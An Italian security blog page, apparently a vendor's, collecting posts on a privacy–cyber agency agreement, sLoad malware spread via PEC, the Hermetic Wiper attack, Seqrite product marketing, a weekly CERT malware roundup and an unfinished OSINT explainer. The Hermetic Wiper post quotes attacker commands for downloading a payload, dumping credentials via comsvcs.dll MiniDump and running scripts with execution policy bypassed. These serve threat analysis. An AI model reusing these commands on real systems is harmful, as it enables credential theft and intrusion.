01[2]

Accordo tra Garante privacy e Agenzia per la sicurezza nazionale cibernetica

mercoledì 23 febbraio 2022
Accordo tra Garante privacy e Agenzia per la sicurezza nazionale cibernetica

Dopo tante parole finalmente di passa ai fatti: il 26 Gennaio 2022 Pasquale Stanzione, presidente dell’Autorità Garante per la Protezione dei dati personali e Roberto Baldoni, direttore generale dell’Agenzia per la sicurezza nazionale cibernetica, hanno sottoscritto il Protocollo d’Intesa Biennale. Questo ha l’obiettivo di attivare una stretta collaborazione in difesa del cyber spazio nazionale e della privacy dei cittadini. Con un’attenzione particolare al fatto che entrambe le materie sono soggette a continui e celeri cambiamenti: il protocollo lascia infatti libere entrambe le parti di poter proporre variazioni e aggiornamento secondo l’avanzamento dello stato dell’arte della tecnologia, delle normative e delle cyber minacce.

Il protocollo: quali obiettivi?
Scopo del protocollo è rendere stabile e normata la cooperazione tra le due istituzioni per

“il miglior esercizio delle rispettive competenze, promuovendo iniziative congiunte nel campo della cybersicurezza nazionale e della protezione dei dati personali”, come si legge nel comunicato ufficiale con cui il Garante e l’ACN hanno annunciato alla stampa la firma del protocollo.

Il comunicato stampa > https://www.garanteprivacy.it/home/docweb/-/docweb-display/docweb/9739921

Tra i due istituti vi sarà un continuo scambio di informazioni e entrambi saranno motore di attività di consapevolezza e promozione di buone pratiche di sicurezza. Saranno previste collaborazioni col mondo accademico e della ricerca.

L’ACN avrà la possibilità di consultarsi col collegio Garante su tutti quei punti che, nel corso dell’attività, potrebbero impattare o anche solo essere attinenti al trattamento dei dati personali. La volontà è quella di garantire la conformità delle attività dell’ACN agli obblighi in tema di privacy, diritti dei cittadini e sicurezza dei dati. La volontà è quella di dare corpo ad una strategia di difesa del cyber spazio nazionale senza entrare in conflitto con i diritti dei cittadini italiani, avendo come stella polare quanto previsto dall’art.6 della Carta di Nizza che sottolinea l’importanza dell’equilibrio tra libertà e sicurezza.

“La cybersicurezza del nostro mondo digitale, a cui è preposta l’Agenzia, è un’attività partecipata che non può che essere svolta in stretta cooperazione con le istituzioni, i cittadini e le imprese. È importante che ognuno, per il raggiungimento dei livelli adeguati di resilienza del Paese richiesti dal ritmo incalzante della trasformazione digitale che aumenta continuamente la superficie d’attacco, faccia la sua parte” ha commentato il Direttore generale dell’Agenzia Roberto Baldoni.

RESILIENZA, PROTEZIONE E INNOVAZIONE.

Il sito ufficiale dell’ACN è disponibile qui.

Vi si legge:

“L’adozione del D.L. 14 giugno 2021, n. 82 ha ridefinito l’architettura nazionale cyber e istituito l’Agenzia per la Cybersicurezza Nazionale (ACN) a tutela degli interessi nazionali nel campo della cybersicurezza. L’ACN è Autorità nazionale per la cybersicurezza e assicura il coordinamento tra i soggetti pubblici coinvolti nella materia. Promuove la realizzazione di azioni comuni volte a garantire la sicurezza e la resilienza cibernetica necessarie allo sviluppo digitale del Paese. Persegue il conseguimento dell’autonomia strategica nazionale ed europea nel settore del digitale, in sinergia con il sistema produttivo nazionale, nonché attraverso il coinvolgimento del mondo dell’università e della ricerca. Favorisce specifici percorsi formativi per lo sviluppo della forza lavoro nel settore e sostiene campagne di sensibilizzazione oltre che una diffusa cultura della cybersicurezza”.

dcadeb09774424486cb40c1829b3b192_a1-640-c-90[1]

sLoad: l’approfondimento del CERT sul malware che colpisce solo in Italia (via PEC)

giovedì 24 febbraio 2022
sLoad: l’approfondimento del CERT sul malware che colpisce solo in Italia (via PEC)

Il CERT ha reso pubblico qualche giorno fa un importantissimo report sul malware sLoad. sLoad è in diffusione in Italia ormai da tempo e si contraddistingue per essere diffuso tramite campagne via email PEC. Il CERT collabora da qualche tempo con alcuni dei principali provider di servizi PEC italiani proprio nell’ottica di individuare, tracciare e quindi contrastare campagne dannose che dovessero transitare tramite un circuito come quello PEC che deve distinguersi necessariamente per sicurezza.

Il report è da inquadrarsi proprio nell’ambito di queste attività di tutela e protezione del circuito PEC, dato che sLoad è veicolato esclusivamente tramite questo canale. Il report abbonda di dettagli tecnici che non renderemo nella loro totalità: tratteremo i punti salienti invitando a consultare il report completo disponibile sul sito istituzionale del CERT.

sLoad: biografia
sLoad è stato diffuso per la prima volta in Italia nell’Ottobre del 2018, anche se alcune fonti datano la prima individuazione nel nostro cyber spazio già nel Giugno 2018. In quel periodo circolava un report del ricercatore di sicurezza Vitali Kremez nel quale si affermava che fosse il malware bancario Ramnit il payload di sLoad.

Per la maggior parte dei ricercatori è un malware pensato appositamente per colpire in Europa (Italia e Inghilterra in primis) ma è andato progressivamente a concentrarsi solo sull’Italia. Nell’osservazione delle campagne italiane non è mai stato individuato il malware Ramnit come payload di Sload, sottolinea il CERT. Si ipotizza quindi che il malware sia nato veicolando Ramnit in Inghilterra e che poi si sia focalizzato sul nostro paese sostituendo il payload.

sLoad: come si diffonde?

Sul punto il CERT ha già pubblicato un report dettagliato: sLoad si diffonde esclusivamente tramite circuito PEC. In realtà, specifica il CERT, le prime campagne sLoad non transitavano via PEC, mentre è certa la data della prima campagna PEC, il 4 Giugno 2019. Da quel momento questo malware è girato solo tramite account PEC precedentemente compromessi e usati per l’invio massivo delle email dannose.
La prima campagna via PEC fu mirata contro l’Ordine degli Ingegneri: evidentemente gli attaccanti avevano messo le mani su molti account PEC collegati all’Ordine e non ebbero remore a sfruttarli. Da quel momento il furto delle credenziali PEC deve aver avuto un certo successo se sLoad ha deciso di limitarsi a quel settore, unico malware ad averlo fatto. Infatti, ricordiamo, le funzionalità principali di sLoad sono due:

rubare credenziali di account PEC per realizzare ulteriori campagne;
accedere alle informazioni di home banking.

sLoad: la mail vettore
Gli esperti del CERT presentano nel report una email “tipo” di queste campagne. Ovviamente la quasi totalità di queste mira al settore bancario, quindi i temi principali sono pagamenti e fatture da pagare.

Fonte: https://cert-agid.gov.it/

Inutile, forse, ribadire quanto una email simile risulti estremamente insidiosa e subdola, soprattutto alla luce del fatto che l’eventuale vittima si vede recapitare il messaggio da un account PEC quindi sicuro.

Queste email contengono allegati che poi, nel tempo, sono stati cambiati:

un file archivio .ZIP con al suo interno un file .LNK;
un file archivio .ZIP contenente a sua volta file .WSF, .VBS o PS1;
per un lungo periodo è stato usato un doppio archivio .ZIP.
Le campagne più recenti hanno visto il ritorno all’archivio .ZIP con file .WSF.

sLoad: qualche info tecnica

L’analisi sottostante riferisce ad un campione recente del malware, diffuso con lo schema archivio .ZIP con file .WSF. Il file WSF estratto dall’archivio contiene, in forma molto offuscata, le istruzioni per il download del payloasd del malware:

HTTPS://TUYTEHFAPP.EU/CAVE//NOVO.RTF in %APPDATA%\NOVO.RTF

tramite BitsAdmin.

Qui c’è la prima accortezza di autotutela del malware: i suoi sviluppatori hanno fatto in modo che i link utilizzati per il download del dropper siano usa e getta. In breve i link, una volta usati per il download, non possono essere utilizzati nuovamente.

Una seconda misura di autodifesa del malware è che il backend di sLoad è in grado di rilevare le richieste che sono generate dal dropper e quelle che non lo sono. Succede quindi che se un ricercatore di sicurezza dovesse provare a scaricare il malware tramite strumenti diversi da quelli previsti dal malware stesso si vede blacklistare l’IP dal quale ha inviato la richiesta e il file viene segnato come non più scaricabile. Insomma, per ridurre al minimo la possibilità che il malware venga analizzato, i ricercatori hanno solo un tentativo a disposizione per campione.

Il dropper scarica uno script Powershell (PS1) ed è questo ad installare ed eseguire il core di Sload. Anche in questo caso parliamo di un file altamente offuscato. Si evince dal codice che sLoad si installa in APPDATA, creando una cartella dal nome random di 9 caratteri. La persistenza è garantita da una specifica task che inizia per S ed è seguita da un numero.

Il che, però, rende facilmente rimuovibile il malware: basterà interrompere ogni processo Powershell oppure rimuovere tutte le task il cui nome inizia per S e sia seguito da un numero.

sLoad: funzionalità dannose
Deoffuscando il codice emergono subito le funzionalità di Remote Access Trojan (RAT), in costante comunicazione con alcuni server di comando e controllo (C2). Tutte le operazioni di rete del malware sono effettuate tramite BitsAdmin (chiamate C2 comprese). Resta fermo il fatto che se vengono rilevate richieste C2 incompatibili con BitsAdmin l’IP che le effettua viene bloccato.

Una volta che il malware trova un C2 valido dal quale ottiene risposta, inizia il suo “sporco mestiere” raccogliendo informazioni come:

la lista di cartelle condivise;
il numero di condivisioni tramite netview;
il nome della CPU e le specifiche del sistema operativo;
la lista dei file OST (file di dati) di Outlook in AppData\Local\Microsoft\Outlook;
l’elencazione dei processi in esecuzione.
Tutte le informazioni raccolte sono inseriti in un JSON che viene poi inviato al server. Queste informazioni servono perché il server possa inviare al malware i comandi da eseguire secondo la macchina colpita.

sLoad, il malware paziente specializzato in elusione dei controlli
sLoad ha alcune peculiarità che è interessante sottolineare. La prima è che, tra una richiesta e l’altra al server, è prevista una pausa di 40 minuti. Una volta però che il malware avrà eseguito il primo comando, questo intervallo sale già a 4 ore. Non solo: il primo payload viene utilizzato soltanto un’ora dopo l’infezione.

Quindi da una parte le richieste sono sempre più diluite nel tempo, dall’altra c’è il problema che le risposte del server C2 rispetto alle operazioni dannose da eseguire varia a seconda dei dati raccolti dalla macchina al momento dell’infezione e inviati al C2. Insomma, questo malware fa di tutto non solo per pasare inosservato, ma anche per nascondersi e per impedire in ogni forma l’analisi da parte dei ricercatori di sicurezza.

01[1]

venerdì 25 febbraio 2022 Hermetic Wiper, il malware usato contro l’Ucraina è già arrivato in Italia. Ha un solo scopo: distruggere

venerdì 25 febbraio 2022
Hermetic Wiper, il malware usato contro l’Ucraina è già arrivato in Italia. Ha un solo scopo: distruggere.

C’è una guerra nella guerra, o forse sarebbe meglio dire che c’è un nuovo aspetto della guerra, meno visibile ma comunque molto devastante. E’ la cyber war ed è l’aspetto forse meno raccontato di questo conflitto in Ucraina.

L’ingresso delle truppe russe in Ucraina è stato anticipato da una pesante giornata di attacchi informatici: i classici DDoS contro siti governativi e i principali istituti bancari del paese, ma non solo. Dalla giornata di mercoledì l’Ucraina è stata investita da una massiva diffusione di un nuovo malware: i ricercatori di sicurezza lo hanno ribattezzato Hermetic Wiper.

Hermetic Wiper: una prima presentazione
Hemertic Wiper è una nuova famiglia di wiper, cioè malware pensati per cancellare tutte le informazioni presenti sui supporti di memoria presenti nelle macchine bersaglio. Si presenta sotto forma di eseguibile che è addirittura firmato con un certificato valido di Hermetica Digital Ltd.

Fonte: ESET

L’eseguibile contiene file driver in 32-bit e 64-bit in forma compressa.

Fonte: Bleeping Computer

I file driver del malware sono firmati con certificato di CHENGDU YIWO Tech Development Co, l’azienda che ha sviluppato EaseUS Partition Master.

Fonte: ESET

Una volta eseguito il malware, questo procede ad installare uno di questi driver come un nuovo Servizio di Windows.

Fonte. Bleeping Computer

Le stringhe entro i driver provengono dal programma Easus Partition Manager.
Disk
\Device\Harddisk%u\Partition0
\Device\EPMNTDRV
\DosDevices\EPMNTDRV

Tra le prime azioni del malware c’è quella di danneggiare l’MBR sulle macchine infette. Di fatto Hermetic Wiper non ha bisogno di molte funzionalità: è un malware distruttivo, pensato solo per distruggere. Danneggiare l’MBR conduce ad un solo possibile risultato: la macchina bersaglio non sarà in grado di avviarsi. La particolarità è che l’MBR viene danneggiato prima del riavvio.

E’ stato distribuito in Ucraina qualche ora prima dello scoppio armato del conflitto, ma alcune tracce dell’attività del malware sono state trovate anche in Lituania e Lettonia. Dopo appena 3 giorni è già arrivato in Italia

La catena di attacco (per quanto ad ora è possibile sapere)
Ad ora non è chiaro come Hermetic Wiper si diffonda: nel caso dell’attacco contro le istituzioni ucraine, si sa che questo è stato preparato per mesi. Secondo alcuni ricercatori infatti le prime attività potenzialmente dannose risalirebbero addirittura al Novembre 2021. Una delle infezioni, analizzate dai ricercatori di Symantec, sembra risalire al 23 Dicembre 2021: le reti di una organizzazione governativa ucraina sono state violate, in quel caso, sfruttando vulnerabilità dell’SMB di un server Microsoft Exchange. Ci sono tracce evidenti di furto di credenziali conseguenti a questo breach. In quella rete risulta installata, in data 16 gennaio, anche una web shell che ha anticipato la distribuzione del wiper, iniziata appunto il 23 Febbraio.

Secondo ESET invece il malware ha, come data di compilazione, il 28 Dicembre 2021 ritenuta la data reale in cui è stato pianificato l’attacco.

Un altro caso analizzato è stata l’infezione di un’azienda Lituana: anche in questo caso la compromissione della rete risale già al Novembre 2021. Pare che l’accesso sia stato ottenuto usando un exploit di Tomcat, tramite il quale è stato eseguito un comando PowerShell. Questo comando è stato usato per scaricare un file JPEG sulla rete bersaglio.

Questo il PowerShell deoffuscato utilizzato per scaricare il file JPEG sulla rete bersaglio:

cmd.exe /Q /c powershell -c “(New-Object System.Net.WebClient).DownloadFile(‘hxxp://192.168.3.13/email.jpeg’,’CSIDL_SYSTEM_DRIVE\temp\sys.tmp1′)” 1> \\127.0.0.1\ADMIN$\__1636727589.6007507 2>&1

Poco dopo è stato creata una task per eseguire un file ‘postgresql.exe’, con i seguenti comandi:

cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE\temp\sys.tmp1 CSIDL_WINDOWS\policydefinitions\postgresql.exe 1> \\127.0.0.1\ADMIN$\__1636727589.6007507 2>&1

schtasks /run /tn “\Microsoft\Windows\termsrv\licensing\TlsAccess”

Nell’analisi dei ricercatori Symantec, questo file postgresql.exe è stato usato per:

eseguire “certutil” per verificare la connettività verso trustsecpro[.]com e whatismyip[.]com;
eseguire un comando PowerShell per scaricare un ulteriore file JPEG da un web server precedentemente compromesso.
Nello stadio successivo il malware ha sfruttato PowerShell per il dump delle credenziali dalle macchine compromesse:

cmd.exe /Q /c powershell -c “rundll32 C:\windows\system32\comsvcs.dll MiniDump 600 C:\asm\appdata\local\microsoft\windows\winupd.log full” 1> \\127.0.0.1\ADMIN$\__1638457529.1247072 2>&1

E’ da questo momento che iniziano ad essere eseguiti molteplici script PowerShell sconosciuti:

powershell -v 2 -exec bypass -File text.ps1
powershell -exec bypass gp.ps1
powershell -exec bypass -File link.ps1
A distanza di 5 minuti, viene scaricato e attivato Hermetic Wiper: sono quindi eseguite le attività di wiping delle memorie presenti sulla macchina.

Un ransomware usato come diversivo per gli attacchi di wiping

In alcuni casi Hermetic Wiper è stato accompagnato da un ransomware: anzi sarebbe più corretto dire che il wiper utilizza come diversivo un nuovo ransomware scritto in linguaggio GoLang. Sempre secondo i ricercatori di Symantec

“è come se l’attacco ransomware sia stato usato come esca o come diversivo rispetto all’attacco di wiping. Questa cosa è molto simile al recente attacco wiper chiamao WhisperGate, anche questo avvenuto contro l’Ucraina. In quel caso il wiper era camuffato da ransomware”

Fonte: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia

Nell’immagine sotto la nota di riscatto fake:

seq2

Seqrite EPS certificato come Advanced Approved Endpoint Protection contro attacchi ransomware complessi

Seqrite EPS certificato come Advanced Approved Endpoint Protection contro attacchi ransomware complessi

Ormai nessuna azienda è ormai al riparo da dannosi e costosissimi attacchi ransomware. Un ransomware può entrare entro un organizzazione attraverso molti vettori: email di spam, attacchi di phishing o download dal web di file dannosi. Questo spinge le aziende, per dotarsi del più alto livello di protezione, ad implementare più livelli di sicurezza sugli endpoint, i gateway i mail server ecc…

Gli attacchi ransonmware sono in continua crescita e si fanno sempre più sofisticati. Soluzioni di Advanced Threat Protection (ATP) sono pensate proprio per minimizzare il rischio di questi attacchi verso gli endpoint aziendali grazie alle capacità di prevenirli prima che si verifichino.

Siamo quindi molto orgogliosi di annunciare che Seqrite ha ricevuto la Certificazione “Advanced Approved Endpoint Protection” 2021 .

“Advanced Approved Endpoint Protection” : di che cosa si tratta?

AV-Test, un provider di servizi di sicurezza IT e ricerca antivirus indipendente e internazionale, ha recentemente testato diversi prodotti di sicurezza, valutandone le capacità di protezione dagli attacchi ransomware. I casi test durante la valutazione sono stati condotti secondo il framework MITRE ed emulando i modelli di attacco mostrati dai vari gruppi di Advanced Persistent Threat. I prodotti di sicurezza sono stati valutati sulla base di quanto efficacemente riescono a proteggere i sistemi targert da attacchi ransomware distribuiti tramite i meccanismi di cui sopra.

Tutti i casi test seguono la matrice fondamentale del MITRE, ovvero sono iniziati con la fase di “Accesso Iniziale” o “Esecuzione”, seguiti da “Evasione delle difese” e infine con la fase di “Raccolta”. Alcuni casi test hanno verificato la capacità di impedire a terzi di prendere il controllo remoto del sistema, detta fase di “Comando e controllo. In tutte le fasi è stato registrato il comportamento dei prodotti di sicurezza e sulla base di questo è stata valutata l’efficacia, tenendo anche conto in quale fase è stato rilevato l’attacco.

Su 10 casi test, Seqrite EPS ha rilevato ben 8 istanze tra la prima e la seconda fase, garantendo comunque protezione agli endpoint anche nei casi resanti. Tuttavia l’attacco ha lasciato alcuni resti sul sistema: tali rilevamenti sono stati considerati come parziali. AV-Test ha analizzato queste rimanenze e sono risultate benigne e non indicative di alcuna infezione riuscita.

Seqrite EPS protegge da ransomware e attacchi APT
Per far fronte ad una minaccia ransomware in continua evoluzione, la suite EPS di Seqrite offre protezione avanzata per rete, dispositivi connessi e dati. La soluzione protegge le aziende da attacchi ransomware avanzati e sofisticati e da attacchi APT dal rilevamento fino alla gestione delle risorse.

Le soluzioni Seqrite consentono di individuare e notificare minacce avanzate – via email, dispositivi mobile, social, endpoint ecc.. – e aiutano a risolverle prima che possano causare danni. Pensato avendo in testa un modello “La prevenzione prima di tutto”, Seqrite EPS protegge le aziende e la forza lavoro da remoto dal panorama sempre più complesso dei cyber attacchi.

I Labs hanno testato le capacità di rilevamento di Seqrite anche in caso di nuovi scenari di attacco con ransomware ancora sconosciuti, come ormai succede sempre più spesso. Nel complesso Seqrite ha ottenuto nei test un punteggio di protezione di 31,5. La certificazione ricevuta garantisce che Seqrite EPS è in grado di gestire attacchi ransomware complessi. Consente quindi alle aziende di recuperare i dati criptati, garantendo nel frattempo la continuità della produzione e la business continuity.

seq

Seqrite EPS certificato di nuovo come Top Product da AV-Test

Seqrite EPS certificato di nuovo come Top Product da AV-Test
OPS, we did it again!

Seqrite EPS 7.6 è stato certificato dal prestigioso AV-Test Institute, che ha sede in Germania, come “Top Product” tra le soluzioni per la protezione dei dati e degli endpoint. E’ la seconda volta consecutiva che Serqrite EPS ottiene questa certificazione. L’AV-Test Insitute è una istituzione certificatrice indipendente che ha sede a Magdeburg, in Germania. I test effettuati sulle nostre soluzioni confermano che con Seqrite EPS le aziende possono proteggere proattivamente gli endpoint, mantenendo al contempo alta produttività. Seqrite ha infatti superato diversi test prima di essere riconosciuto da AV-Test come uno dei migliori provider di sicurezza per gli endpoint in ambienti aziendali.

Il nostro percorso verso l’eccellenza

L’AV-Test Institute ha condotto una serie di test prima di nominare Seqrite EPS tra i migliori provider di soluzioni di sicurezza per gli endpoint. Sono stati valutati molti fattori, tra i quali
protezione;
performance;
usabilità.
Protezione
Rispetto a questo parametro, Seqrite EPS ha dimostrato che:
l’efficacia del nostri servizi di sicurezza per le aziende nel gestire il problema malware e per offrire protezione contro attacchi malware 0-day;
la capacità di individuare la maggior parte dei malware scoperti nelle 4 settimane precedenti ai test.
Cosa significa tutto questo per la tua azienda?
Significa che Seqrite è in grado di identificare i malware, i trojan e altre forme di attacco e fornire protezione completa. I risultati di AV-Test confermano che la nostra soluzione blocca con successi anche tutti i tentativi dannosi di accesso alla rete e copre ogni possibile funzione di sicurezza. Quindi, installando Seqrite non correrai più rischi, grazie al fatto che:
impedisce l’accesso a URL dannosi;
individua e blocca qualsiasi exploit presente su un sito web;
blocca il download di file e componenti dannosi;
impedisce l’uso di tool e software dannosi.
Performance
Rispetto a questo parametro, Seqrite EPS è stato testato per verificare come e quanto influisce sulle performance e la velocità del sistema. Qui, abbiamo totalizzato un totale di 6 punti su una scala di 6.

In che modo questo influisce sulla tua azienda?
L’installazione di Seqrite non influenzerà la velocità, le performance e le altre operazioni dei computer aziendali, rendendo il processo leggero, veloce e sicuro allo stesso tempo;
il lavoro quotidiano e le performance non saranno intaccati e non ci sarà bisogno di preoccuparsi di rallentamenti al momento di:
> eseguire programmi software o visualizzare siti web;
> scaricare e lanciare programmi usati di frequente;
> storage dei dati e trasferimento.
Usabilità
Questo parametro riferisce al modo in cui Seqrite EPS influenza l’efficacia del sistema nel determinare qualsiasi minaccia malware. Anche in questa categoria, Serite EPS ha ottenuto un punteggio di 6 su 6.

In che modo questo influisce sulla tua azienda?
non riceverai falsi positivi, dato che Seqrite EPS si è dimostrato molto accurato;
nel corso della scansione del sistema, Seqrite EPS non segnalerà come malware i software legittimi;
nessuna azione verrà bloccata durante l’uso e l’installazione di un software legittimo a causa di falsi positivi.
Come Seqrite protegge dalle minacce informatiche?
Con le recenti evoluzioni degli ambienti di lavoro (smart working) e l’evolversi continuo delle minacce alla sicurezza informatica, è più difficile che mai garantire la sicurezza degli endpoint.

Con Seqrite
i tuoi dati saranno al sicuro tutti i giorni;
tutti i tuoi sistemi saranno protetti da attacchi imprevisti;
puoi operare in tutta tranquillità anche quando i dipendenti lavorano da casa.
Perchè Seqrite è così importante per le aziende?
Forniamo un servizio eccellente perché riteniamo che sia sufficiente una sola minaccia, un solo attacco per far collassare l’intera attività. Le aziende operano ormai in un contesto di elevato cyber rischio e le nostre soluzioni mitigano e riducono il problema, proteggendo dati e infrastrutture. Non accettare niente di meno, accetta solo il meglio: opta per Seqrite EPS, come riconosciuto da AV-Test.

01+28129+28129[1]

Cosa “gira” in Italia? Malware e campagne di attacco individuate dal CERT – 2° settimana Febbraio 2022

venerdì 18 febbraio 2022
Cosa “gira” in Italia? Malware e campagne di attacco individuate dal CERT – 2° settimana Febbraio 2022

Quali malware girano nel panorama italiano? Quali campagne di attacco? Quali sono i malware che un team di sicurezza IT dovrebbe tenere d’occhio per aggiornare gli indici di compromissione dei sistemi di sicurezza così che possano bloccare un’infezione alla fonte?

A queste domande risponde settimanalmente il CERT-AgID con un apposito report che rende una fotografia delle cyber minacce individuate e analizzate dal team di esperti del Computer Emergency Response Team italiano.

I malware della 2° settimana di Febbraio
La scorsa settimana il CERT-AGID ha individuato e analizzato ben 55 campagne dannose attive nel cyber spazio italiano. 52 di queste sono state campagne mirate contro utenti italiani, 3 invece quelle generiche ma veicolate anche nel nostro paese.

Le famiglie malware individuate in diffusione sono state 11: Emotet si conferma il malware più diffuso in Italia.

Emotet è stato diffuso con ben 6 campagne nel corso della settimana. I temi delle campagne sono stati Conferma, Resend e Documenti: i file vettore erano nei formati .XLS, .XLSM, .ZIP;
AgentTesla è stato diffuso con 4 diverse campagne a tema Pagamenti e Documenti. Tutte le email recavano file archivi .ZIP compromessi;
Ursnif è stato diffuso con 3 campagne che hanno emulato comunicazioni ufficiali dell’Agenzia delle Entrare. Le email contenevano allegato .ZIP protetti da password oppure file .DOC con macro dannosa;
Formbook invece è stato diffuso con 3 campagne, 2 mirate contro utenti italiani, una generica. I temi delle campagne sono stati Ordine e Pagamenti, gli allegati vettore dannosi erano nei formati .ZIP e .IMG;
Brata è stato diffuso con due diverse campagne SMS: i messaggi contenevano il link per il download di un file APK dannoso;
Avemaria è stato diffuso con due diverse campagne: Ordine e Pagamenti i temi. Le email veicolavano archivio .ZIP e .RAR compromessi;
RedLine è stato diffuso con una sola campagna, comunque generica. Le email veicolavano allegati .ZIP contenenti, a loro volta, un file .LNK;
AteraAgent è stato diffuso con una campagna mirata contro utenti italiani a tema Documenti: è stato diffuso con una campagna italiana a tema Pagamenti. Le email veicolavano allegati .MSI;
AsyncRat è stato diffuso con una campagna mirata contro utenti italiani a tema Documenti: le email veicolavano allegati .ZIP contenenti a loro volta file .VBS;
jRAT è stato diffuso con una campagna italiana a tema Documenti, le email recavano direttamente in allegato il file .EXE;
sLoad è stato diffuso con una campagna a tema pagamenti veicolata via PEC. Qui l’alert del CERT-AGID con le specifiche.
Avemaria in breve:
è un malware già conosciuto, individuato in diffusione in Italia nel Luglio di quest’anno: il nome viene da una stringa di codice del malware stesso. E’ un malware infostealer pensato per il furto delle credenziali degli account di posta elettronica da Microsoft Exchange Client o Outlook e dai browser.

RedLine in breve:
RedLine è un infostealer conosciuto fin dagli inizi del 2020: già diffuso all’estero entro utility o giochi, sbarca per la prima volta in Italia. E’ un MaaS, malware as a service, affittabile via Telegram sotto abbonamento, con un costo che varia dai 150 dollari al mese agli 800 per 3 mesi. E’ molto utilizzato per rubare informazioni da rivendere ma anche, sopratutto, credenziali in vista di attacchi futuri. Molto spesso è utilizzato per rivendere le informazioni rubate agli autori di ransomware.

Per approfondire > Nuova variante della campagna email sLoad si diffonde via PEC: il CERT interviene e la blocca prima che possa diffondersi

Fonte: https://cert-agid.gov.it/

Le campagne di phishing della 2° settimana di Febbraio
Le campagne di phishing individuate e analizzate sono state ben 30 ed hanno coinvolto 15 diversi Brand. Si è trattato di un diluvio di attacchi contro il settore bancario e i loro clienti: Intesa San Paolo, MPS, BPER, Poste, Nexi, Che Banca, BNP Paribas, Unicredit ecc.. sono tutti istituti bancari che hanno visto sfruttare il proprio brand a fini di furto dei dati e delle credenziali di accesso all’home banking. Sul podo dei brand più sfruttati Intesa San Paolo, MPS e in terza posizione (per diffusione) si collocano le campagne generiche, ovvero che non citano specifici brand.

Le uniche campagne di phishing che non hanno riguardato il settore bancario hanno riguardato Facebook, Università, Agenzia delle Entrate e, di nuovo, una serie di campagne per il furto delle credenziali di accesso ad Aruba e altri servizi web ed email.

Fonte: https://cert-agid.gov.it/

Tipologia di file di attacco e vettore
Tra i file vettore più utilizzati dagli attaccanti troviamo una netta predominanza netta, come la scorsa settimana, del formato archivio .ZIP. Secondo e terzo posto rispettivamente per i formati .EXE e .XLS.

Fonte: https://cert-agid.gov.it/

01[1]

Open Source Intelligence (OSINT): che cosa è, a chi serve, perchè il cyber crimine ne sta approfittando

venerdì 18 febbraio 2022
Open Source Intelligence (OSINT): che cosa è, a chi serve, perchè il cyber crimine ne sta approfittando

CHE COSA
Partiamo dalle basi: con OSINT ci si riferisce, semplicemente, a tutte le informazioni che sono disponibili al pubblico. E una disciplina mirata alla ricerca e acquisizione di informazioni tramite le cosiddette fonti aperte ed è oggi strettamente legata all’attività investigativa. Se se ne volesse indicare una data di nascita, occorrerebbe risalire alla II Guerra Mondiale, quando si affermò come strumento di raccolta e analisi di informazioni da parte delle agenzie di sicurezza e intelligence di molte nazioni coinvolte nel conflitto.

Rimanendo confinati all’uso legale dell’OSINT, le informazioni devono essere pubblicamente disponibili: insomma, in linea teorica, sarebbero utilizzabili soltanto dati provenienti da fonti accessibili senza violare leggi sulla privacy, sul copyright e il codice penale. Oggi ne viene fatto largo uso da parte delle aziende, che possono raccogliere e analizzare informazioni sui concorrenti per elaborare strategie di business.

Sono fonti OSINT comuni:

ovviamente tutti i mass media tradizionali come radio, TV, giornali, libri ecc…
riviste specializzate contenenti pubblicazioni tecniche, accademiche, atti di convegni ecc…
foto e video, con tutto il loro carico di metadati;
informazioni geospaziali e di localizzazione di vario tipo;
tutto ciò che si trova nel web, accessibile via Internet: social network, blog, siti di streaming e condivisione video, indirizzi IP, risultati di motori di ricerca, i Whois dei nomi di dominio ecc…
CHI

Sempre limitandoci all’uso legale che si può fare dell’OSINT, tra i soggetti interessati troviamo indubbiamente i governi: è un dato di fatto che i dipartimenti militari siano i principali sfruttatori di fonti OSINT. Si va dalle necessità correlate alla sicurezza nazionale, fino alla raccolta di informazioni utili per i politici, alla comprensione dell’opinione pubblica, all’antiterrorismo ecc…
La polizia utilizza quotidianamente fonti OSINT per proteggere le persone da furto di identità, violenze private e ricatti ecc… Spesso le polizie accedono a fonti OSINT in funzione preventiva: come nel film Minority Report, queste informazioni sono utilizzate per prevenire i crimini prima che si intensifichino e, in alcuni casi, perfino prima che si verifichino.

Le aziende ne fanno comunemente uso per analisi di mercato, sulla concorrenza, per verificare e pianificare l’attività di marketing e raccogliere informazioni utili a prevedere trend e andamenti. Vi sono anche scopI non direttamente finanziari: l’analisi di fonti OSINT è molto utile per raccogliere informazioni sulle minacce informatiche. Un’azienda può accedere a tali fonti per pianificare una corretta gestione dei cyber rischi e per proteggersi non solo in termini tecnici, ma anche reputazionali e finanziari, in caso di attacco.

Anche una persona comune potrebbe (e quasi tutti già lo facciamo senza averne consapevolezza) accedere ai motori di ricerca, ai social e altre fonti per verificare la propria identità digitale online. Ad esempio un utente potrebbe voler approfondire ciò che l’internet service provider sa di lui, quanto le sue informazioni personali siano esposti nel web ma anche l’eventuale presenza di dati personali pubblicati inavvertitamente. L’OSINT è ad esempio molto utile per combattere il furto di identità ed è strettamente correlato al diritto all’oblio.

COME
L’attività di OSINT è praticabile grazie all’esistenza di una lunga serie di tool e software. Ad esempio, se si volessero identificare indirizzi IP e domini ad esso collegati si potrebbero usare strumenti con Shodan o Censys: questi, disponibili con una semplice connessione internet, sono capaci di trovare indirizzi IP, informazioni sui server, ulteriori informazioni esposte. Shodan consente anche di individuare tutti i dispositivi appartenenti ad un certo fornitore o tutti i dispositivi geolocalizzati una stessa zona…

Ma ci sono software come Spiderfoot (integrato nel sistema operativo specializzato in penetration testing Kali Linux) che, attingendo ad un centinaio di diverse fonti, può partire da una informazione per individuare indirizzi email, indirizzi IP, server DNS, nomi domini, credenziali di accesso ecc…

Una ricerca Whois invece consente banalmente di trovare il contatto dell’amministratori di un dominio. Servizi come HaveIbeenPwned, di cui abbiamo ogni tanto parlato, consentono di verificare se la propria email sia stata violata o meno: per garantire il servizio, semplicemente, il tool si avvale di tutte le fonti OSINT disponibili, dark web compreso.

Github, Gitlab e simili sono anche essi fonti OSINT: vi si possono cercare problemi di configurazione di sistemi software, vulnerabilità, chiavi private, token di autenticazione ecc… con tutto il carico di informazioni che questi si portano dietro.

Insomma, OSINT di per sé è una attività assolutamente legale (se svolta entro i limiti normativi) che, attingendo alle infinite fonti e agli infiniti dati che ormai sono ospitati nel web, consente dettagliati analytics, puntuali informazioni, indagini sui quali si possono basare diverse tipologie di attività, strategie e pianificazioni.

Perchè il cyber crimine ne sta approfittando?
